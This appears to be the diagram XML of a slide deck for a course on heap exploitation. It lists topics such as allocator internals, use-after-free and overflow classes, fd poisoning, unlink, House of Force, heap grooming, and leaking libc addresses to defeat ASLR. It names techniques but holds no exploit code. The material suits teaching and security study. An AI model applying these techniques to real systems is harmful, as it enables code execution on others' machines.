    <dgm:cxn modelId="{AC3C6366-8E85-6341-A70B-EB7ED29C2C4A}" type="presParOf" srcId="{474A3DA5-D966-E945-B750-7FADDD18B5BC}" destId="{5A89B1EA-4B27-8247-90E3-36DF8A085054}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{BA6D33D1-8192-A745-BEF6-5A43A9B3D934}" type="presParOf" srcId="{B76DC98F-15E0-AC4C-BBEF-F7F5FCD4E4E7}" destId="{DE890018-1729-2442-9F66-F8449CCE2C51}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{8818B8F4-84F7-2943-8CA3-F7E6345A0785}" type="presParOf" srcId="{B76DC98F-15E0-AC4C-BBEF-F7F5FCD4E4E7}" destId="{6EA79D6D-79EB-7E48-B5AA-BFAD847CC03B}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{04545E9B-EACC-5E48-83BC-48C4D2396187}" type="presParOf" srcId="{B76DC98F-15E0-AC4C-BBEF-F7F5FCD4E4E7}" destId="{1E5A4938-16A7-B34F-8C45-A122994C3A62}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{BA2B2043-5723-E04E-AA85-66D8F8524C66}" type="presParOf" srcId="{B76DC98F-15E0-AC4C-BBEF-F7F5FCD4E4E7}" destId="{7D88C812-B000-564E-8B46-6C88AC19ABD9}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{BF2B906A-1B7D-B14F-82FE-22D3DFAC99FA}" type="presParOf" srcId="{7D88C812-B000-564E-8B46-6C88AC19ABD9}" destId="{7A280B71-36B8-BE4C-AFE4-F61ADC849FB0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{6496E82D-DEB4-A044-978B-F53891C8D3DD}" type="presParOf" srcId="{7D88C812-B000-564E-8B46-6C88AC19ABD9}" destId="{D8308956-C922-814C-BE5C-D8A44A268CC1}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{0962282E-836F-EA4A-9E3A-FE476D9ECE72}" type="presParOf" srcId="{B76DC98F-15E0-AC4C-BBEF-F7F5FCD4E4E7}" destId="{B0D5CBA5-5223-184C-AE80-609E43F5F6D8}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{23965673-98D2-FE49-B2E6-C9587B5B1E5F}" type="presParOf" srcId="{B76DC98F-15E0-AC4C-BBEF-F7F5FCD4E4E7}" destId="{FCB0B013-4EB6-B24C-B1DB-ADD795E467B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F373A-0F92-48E9-8265-301DD8910506}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1354"/>
          <a:ext cx="7886700" cy="6864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B7FAE-D146-49B6-8CC5-08B3C1BA6EF5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="207661" y="155813"/>
          <a:ext cx="377565" cy="377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9B8C9-0A2B-40A8-9331-BB40445DC1BA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="792888" y="1354"/>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977900">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="2200" kern="1200"/>
            <a:t>Introduction to the Allocator (chunks, bins, etc.) </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="792888" y="1354"/>
        <a:ext cx="7093811" cy="686483"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{CC042912-3B7C-4F7B-99FA-F146F2A6F950}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="859458"/>
          <a:ext cx="7886700" cy="6864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C4D5D5-A81A-4F61-9B06-F8B9DDFA427B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="207661" y="1013917"/>
          <a:ext cx="377565" cy="377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2F8A12-8F7E-473D-A2E0-444A7AF4CFC6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="792888" y="859458"/>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977900">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="2200" kern="1200"/>
            <a:t>Vulnerability Classes (use after free, overflow, double free) </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="792888" y="859458"/>
        <a:ext cx="7093811" cy="686483"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{04E8DDB2-D5FD-4759-8AF7-4622C55AF0D5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1717562"/>
          <a:ext cx="7886700" cy="6864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38D49-E286-4FA3-99E5-2F2340A10930}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="207661" y="1872021"/>
          <a:ext cx="377565" cy="377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FFF0D1-4A23-418F-A282-3117EA1DC2F7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="792888" y="1717562"/>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977900">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="2200" kern="1200"/>
            <a:t>Techniques (Fd Poison, Unlink, House of Force…) </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="792888" y="1717562"/>
        <a:ext cx="7093811" cy="686483"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{AC42A769-9035-43C8-86E3-07B01B6EBD8E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2575666"/>
          <a:ext cx="7886700" cy="6864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D55A12-10BB-4371-8F01-164DAD6D4F79}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="207661" y="2730125"/>
          <a:ext cx="377565" cy="377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C8257E-F815-46A4-8A00-25C28B2F807B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="792888" y="2575666"/>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977900">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="2200" kern="1200"/>
            <a:t>Information leaks/defeating ASLR</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="792888" y="2575666"/>
        <a:ext cx="7093811" cy="686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A7FF0-9837-9C4D-A601-2AD36DC83AF9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="9447" y="346268"/>
          <a:ext cx="2550671" cy="7652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560" tIns="201560" rIns="201560" bIns="201560" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="1111250">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="2500" kern="1200" dirty="0"/>
            <a:t>Discovery</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="9447" y="346268"/>
        <a:ext cx="2550671" cy="765201"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5B6C1A69-BF31-2F48-BD81-0ABBF351EB0B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="9447" y="1111470"/>
          <a:ext cx="2550671" cy="180576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marL="0" lvl="0" indent="0" algn="l" defTabSz="755650">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1700" kern="1200" dirty="0"/>
            <a:t>Find real vulnerabilities</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="114300" lvl="1" indent="-114300" algn="l" defTabSz="577850">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1300" kern="1200" dirty="0"/>
            <a:t>UAF</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="114300" lvl="1" indent="-114300" algn="l" defTabSz="577850">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1300" kern="1200" dirty="0"/>
            <a:t>Uninitialized memory </a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="114300" lvl="1" indent="-114300" algn="l" defTabSz="577850">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1300" kern="1200" dirty="0"/>
            <a:t>Integers overflows</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="114300" lvl="1" indent="-114300" algn="l" defTabSz="577850">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1300" kern="1200" dirty="0"/>
            <a:t>Etc. </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="9447" y="1111470"/>
        <a:ext cx="2550671" cy="1805764"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{EB327EF0-AC35-D544-9E8E-21DBBF6AC732}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2668014" y="346268"/>
          <a:ext cx="2550671" cy="7652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560" tIns="201560" rIns="201560" bIns="201560" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="1111250">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="2500" kern="1200" dirty="0"/>
            <a:t>Groom</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2668014" y="346268"/>
        <a:ext cx="2550671" cy="765201"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{FFE7C057-3DD9-FD4E-BB5E-66BCDDBBE4CE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2668014" y="1111470"/>
          <a:ext cx="2550671" cy="180576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marL="0" lvl="0" indent="0" algn="l" defTabSz="755650">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1700" kern="1200" dirty="0"/>
            <a:t>Heap Feng Shui like a professional </a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="l" defTabSz="755650">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1700" kern="1200" dirty="0"/>
            <a:t>Allocation/deallocation primitives</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2668014" y="1111470"/>
        <a:ext cx="2550671" cy="1805764"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{3308D2C7-7031-E147-B08E-4A839BD7E511}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5326580" y="346268"/>
          <a:ext cx="2550671" cy="7652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560" tIns="201560" rIns="201560" bIns="201560" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="1111250">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="2500" kern="1200"/>
            <a:t>Exploit</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5326580" y="346268"/>
        <a:ext cx="2550671" cy="765201"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{173132A0-8F0E-5A46-9688-8CF324862B5C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5326580" y="1111470"/>
          <a:ext cx="2550671" cy="180576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marL="0" lvl="0" indent="0" algn="l" defTabSz="755650">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1700" kern="1200" dirty="0"/>
            <a:t>Information leak for </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1700" kern="1200" dirty="0" err="1"/>
            <a:t>libc</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1700" kern="1200" dirty="0"/>
            <a:t> and heap addresses</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="l" defTabSz="755650">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1700" kern="1200" dirty="0"/>
            <a:t>Use after free for code execution</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5326580" y="1111470"/>
        <a:ext cx="2550671" cy="1805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42561-1B2B-3143-93AF-C9A1E0E2B25B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1311048" y="2231"/>
          <a:ext cx="2506953" cy="150417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Source to Sink</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1311048" y="2231"/>
        <a:ext cx="2506953" cy="1504172"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5B652EDA-D011-4E42-9A75-B4BB634D452B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4068697" y="2231"/>
          <a:ext cx="2506953" cy="150417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Sink to Source</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4068697" y="2231"/>
        <a:ext cx="2506953" cy="1504172"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{71343DB3-A64C-AE49-BAFB-AACF1BC2BC64}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2689873" y="1757099"/>
          <a:ext cx="2506953" cy="150417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Pattern Matching</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2689873" y="1757099"/>
        <a:ext cx="2506953" cy="15041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4FF91-5414-5D44-8797-C579B022DE73}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="313071"/>
          <a:ext cx="7886700"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F8D182-4098-A040-84EA-BF13153C3C00}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="394335" y="47391"/>
          <a:ext cx="5520690"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00100">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0"/>
            <a:t>Uninitialized Memory </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="420274" y="73330"/>
        <a:ext cx="5468812" cy="479482"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B2B2437E-A3F0-614E-9862-B6D2D1DAF289}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1129552"/>
          <a:ext cx="7886700"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257186-8BE0-314E-99F1-B94DBE6E2488}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="394335" y="863872"/>
          <a:ext cx="5520690"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00100">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
            <a:t>Use after free read</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="420274" y="889811"/>
        <a:ext cx="5468812" cy="479482"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{89AD06F3-BF00-7145-8B03-1BCA279280F8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1946032"/>
          <a:ext cx="7886700"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93BF18-2193-C44A-A20B-65338489AC29}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="394335" y="1680352"/>
          <a:ext cx="5520690"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00100">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
            <a:t>Out of bounds read</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="420274" y="1706291"/>
        <a:ext cx="5468812" cy="479482"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{120E51CA-335C-E044-B1D4-4611BAE02C76}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2762512"/>
          <a:ext cx="7886700"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6396B2-B749-A146-97EF-77F9C856450F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="394335" y="2496832"/>
          <a:ext cx="5520690"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00100">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
            <a:t>Others (not talked about in course) i.e. format strings</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="420274" y="2522771"/>
        <a:ext cx="5468812"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1BD3B-5BE1-BC49-BD74-96BCC9800964}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="219921"/>
          <a:ext cx="7709438"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Easy way to control the </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2700" b="1" i="1" u="sng" kern="1200"/>
            <a:t>shape</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2700" kern="1200"/>
            <a:t> of the heap</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="31613" y="251534"/>
        <a:ext cx="7646212" cy="584369"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{46C2DB11-403D-084C-9CEE-E4C6D43A4FD7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="945276"/>
          <a:ext cx="7709438"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Calls to </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2700" kern="1200" dirty="0">
              <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>malloc() </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2700" kern="1200" dirty="0"/>
            <a:t>&amp; </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2700" kern="1200" dirty="0">
              <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>free() </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2700" kern="1200" dirty="0"/>
            <a:t>with lots of control</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="31613" y="976889"/>
        <a:ext cx="7646212" cy="584369"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{ABBE7F2A-F497-DB4E-B666-CE6AE87251AF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1670632"/>
          <a:ext cx="7709438"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i="1" u="sng" kern="1200"/>
            <a:t>Amount</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2700" kern="1200"/>
            <a:t> of allocations/frees</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="31613" y="1702245"/>
        <a:ext cx="7646212" cy="584369"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{BB096D44-F5EE-3F49-94B3-3DC92C39AA3C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2395987"/>
          <a:ext cx="7709438"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i="1" u="sng" kern="1200"/>
            <a:t>Size</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2700" kern="1200"/>
            <a:t> of allocations/frees</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="31613" y="2427600"/>
        <a:ext cx="7646212" cy="5843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09741-BCF9-496F-93DB-5ED46C7DE7D9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1131974" y="11751"/>
          <a:ext cx="1921500" cy="1921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D9F4EC-ADC8-4A2B-8B80-76608FFCA641}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1541474" y="421251"/>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8EB95-1FD8-4043-9E37-704C714EB774}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="517724" y="2531752"/>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Allocator based techniques don’t always work</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="517724" y="2531752"/>
        <a:ext cx="3150000" cy="720000"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C102885D-AD41-441B-8AF8-DE058AFDB7A3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
